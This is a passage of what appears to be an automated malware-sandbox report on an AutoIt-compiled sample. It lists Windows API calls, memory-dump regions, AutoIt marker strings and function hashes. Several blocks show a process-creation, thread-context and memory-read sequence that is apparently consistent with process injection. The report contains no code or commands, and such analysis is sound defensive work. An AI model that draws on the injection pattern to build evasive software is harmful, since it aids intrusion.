                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00A81ACD
                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00A81AF1
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00A81B13
                                                    • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 00A81E1C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2183327966.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_a80000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
                                                    • String ID:
                                                    • API String ID: 572931308-0
                                                    • Opcode ID: dd5ff2c0333f679b22dfbad47a12c49e5bc70870eaab63e39cb7295a27d4d700
                                                    • Instruction ID: 89da9a4bfc3c5afffa84a9fc1babdb23c16ac87e4784f714c6faa3e7954c908d
                                                    • Opcode Fuzzy Hash: dd5ff2c0333f679b22dfbad47a12c49e5bc70870eaab63e39cb7295a27d4d700
                                                    • Instruction Fuzzy Hash: 78620930A14258DBEB24DFA4C850BEEB376FF58700F1091A9D50DEB290E7799E81CB59
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                    • String ID:
                                                    • API String ID: 2782032738-0
                                                    • Opcode ID: fb16396c4888a36c6042d732b94f2f162be42afe05c4db1d89babc72b21305f5
                                                    • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                    • Opcode Fuzzy Hash: fb16396c4888a36c6042d732b94f2f162be42afe05c4db1d89babc72b21305f5
                                                    • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: Error:
                                                    • API String ID: 4104443479-232661952
                                                    • Opcode ID: 86678f6fbf30c96828b7bd75d44360d673c824b059c9aa0e8d292ec67add6943
                                                    • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                    • Opcode Fuzzy Hash: 86678f6fbf30c96828b7bd75d44360d673c824b059c9aa0e8d292ec67add6943
                                                    • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                    APIs
                                                    • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                      • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                      • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                      • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                      • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                      • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                      • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                    • String ID: X$pWH
                                                    • API String ID: 85490731-941433119
                                                    • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                    • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                    • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                    • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                    APIs
                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00431E34
                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00431E4C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Temp$FileNamePath
                                                    • String ID: aut
                                                    • API String ID: 3285503233-3010740371
                                                    • Opcode ID: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                                    • Instruction ID: 5bfe3c05d54daaccf8cad0b894ff223c4051d717a215ac0b7ff4b7edb98d8c84
                                                    • Opcode Fuzzy Hash: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                                    • Instruction Fuzzy Hash: A8D05EB95403086BD324EB90ED4EFA9777CE744700F508AE9BE14461D1AAF06A54CBE9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: __wcsicoll
                                                    • String ID:
                                                    • API String ID: 3832890014-0
                                                    • Opcode ID: aa375a1e5e5af9c950a9d1672931dd9a08118e577b360bdf55d40e9ca9d53fc0
                                                    • Instruction ID: 8cfb0e6e77498b774e675cfd1e0e99cb0b6ebb9ed9852495d4fde95f2c7dcd06
                                                    • Opcode Fuzzy Hash: aa375a1e5e5af9c950a9d1672931dd9a08118e577b360bdf55d40e9ca9d53fc0
                                                    • Instruction Fuzzy Hash: 96A1FA7220020A4FD710EF6AE8819ABB7A5EF84315F10856FFD85D7341EF3A9825CB95
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                    • String ID:
                                                    • API String ID: 1794320848-0
                                                    • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                    • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                    • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                    • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00431DF5
                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?), ref: 00431E0D
                                                    • CloseHandle.KERNEL32(00000000), ref: 00431E14
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleTime
                                                    • String ID:
                                                    • API String ID: 3397143404-0
                                                    • Opcode ID: 652760460537c60afb823e5992d28b38c9a9f9fa5742e3fc7e82df653fee10b1
                                                    • Instruction ID: 810a19753c0f2c4684b0bfc273ce87ce290b2c8a2af4acb4f2079771c7d617b3
                                                    • Opcode Fuzzy Hash: 652760460537c60afb823e5992d28b38c9a9f9fa5742e3fc7e82df653fee10b1
                                                    • Instruction Fuzzy Hash: 50E01275240214BBE6205B54DC4EF9F7758AB49B20F108615FF156B1D0C6B4695187A8
                                                    APIs
                                                    • _free.LIBCMT ref: 0043210A
                                                      • Part of subcall function 00413748: RtlFreeHeap.NTDLL(00000000,00000000,?,00417A5A,00000000), ref: 0041375E
                                                      • Part of subcall function 00413748: GetLastError.KERNEL32(00000000,?,00417A5A,00000000), ref: 00413770
                                                    • _free.LIBCMT ref: 0043211D
                                                    • _free.LIBCMT ref: 00432130
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                                    • Instruction ID: d08fe22c6a524c27e4c6c7bcf1019f14b9a5eff3fc739cf1d41fcb720108e0a5
                                                    • Opcode Fuzzy Hash: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                                    • Instruction Fuzzy Hash: 29E092F290071433CD1099219941A87F38C4B15B11F08402AFA15A3301E969FA40C1E9
                                                    APIs
                                                      • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                    • _free.LIBCMT ref: 004295A0
                                                      • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                      • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                      • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                      • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                      • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                      • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                    • String ID: >>>AUTOIT SCRIPT<<<
                                                    • API String ID: 3938964917-2806939583
                                                    • Opcode ID: 371c3dc2c4912be8d8a4f7f9b0d0a9966ce2b3ac88618a8788b134274be20d2a
                                                    • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                    • Opcode Fuzzy Hash: 371c3dc2c4912be8d8a4f7f9b0d0a9966ce2b3ac88618a8788b134274be20d2a
                                                    • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                    APIs
                                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00A8238A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2183327966.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_a80000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID: D
                                                    • API String ID: 963392458-2746444292
                                                    • Opcode ID: efdf82a1e48cd01f1f44ac0dffb6eebfaf3faa77ee3fda0e7163886e06ef651f
                                                    • Instruction ID: 6cd0ff4a03877322247502aa661c44bd8b0302b12c2635ade17e9c12acc3cfe9
                                                    • Opcode Fuzzy Hash: efdf82a1e48cd01f1f44ac0dffb6eebfaf3faa77ee3fda0e7163886e06ef651f
                                                    • Instruction Fuzzy Hash: 56011D7194030CABDB24EBE0CC59FFE777CEF44701F508519BA169A180FA789A088B61
                                                    Strings
                                                    • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _strcat
                                                    • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                    • API String ID: 1765576173-2684727018
                                                    • Opcode ID: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                                    • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                    • Opcode Fuzzy Hash: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                                    • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                    APIs
                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00A81ACD
                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00A81AF1
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00A81B13
                                                    • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 00A81E1C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2183327966.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_a80000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
                                                    • String ID:
                                                    • API String ID: 572931308-0
                                                    • Opcode ID: 1255ff05a3a391cede1f89d856dff3995fd10eb49087fc5ba29911cf4b5d1436
                                                    • Instruction ID: bd1e3f23e455b2b4156e09c080dcb5635a21aeeab870b6ec0e101644da20321b
                                                    • Opcode Fuzzy Hash: 1255ff05a3a391cede1f89d856dff3995fd10eb49087fc5ba29911cf4b5d1436
                                                    • Instruction Fuzzy Hash: F312CD24E24658C6EB24DF64D8507DEB232FF68300F1094E9910DEB7A5E77A4F81CB5A
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: 0833d2bc4d7f4d1f3d4ff62134b7fb59c2041fd718bf1103333beb5859437de4
                                                    • Instruction ID: 2565b1472f88146c75409e19c065a4aacb94a5f6c219594ae44f545f2623c2f3
                                                    • Opcode Fuzzy Hash: 0833d2bc4d7f4d1f3d4ff62134b7fb59c2041fd718bf1103333beb5859437de4
                                                    • Instruction Fuzzy Hash: 85412871D00104AFDB10AF15C881BAE7B74AF4670CF14C05AFA055B342E63DA946CBAA
                                                    APIs
                                                      • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                      • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                      • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                    • _strcat.LIBCMT ref: 0040F786
                                                      • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                      • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                    • String ID:
                                                    • API String ID: 3199840319-0
                                                    • Opcode ID: bb46ec354e5f074944f6d6ffaaad758367fe0d935ff0e0da6eb4efd6d0eafcba
                                                    • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                    • Opcode Fuzzy Hash: bb46ec354e5f074944f6d6ffaaad758367fe0d935ff0e0da6eb4efd6d0eafcba
                                                    • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                    APIs
                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                    • __lock_file.LIBCMT ref: 00414A8D
                                                      • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                    • __fclose_nolock.LIBCMT ref: 00414A98
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                    • String ID:
                                                    • API String ID: 2800547568-0
                                                    • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                    • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                    • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                    • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                    APIs
                                                    • __lock_file.LIBCMT ref: 00415012
                                                    • __ftell_nolock.LIBCMT ref: 0041501F
                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
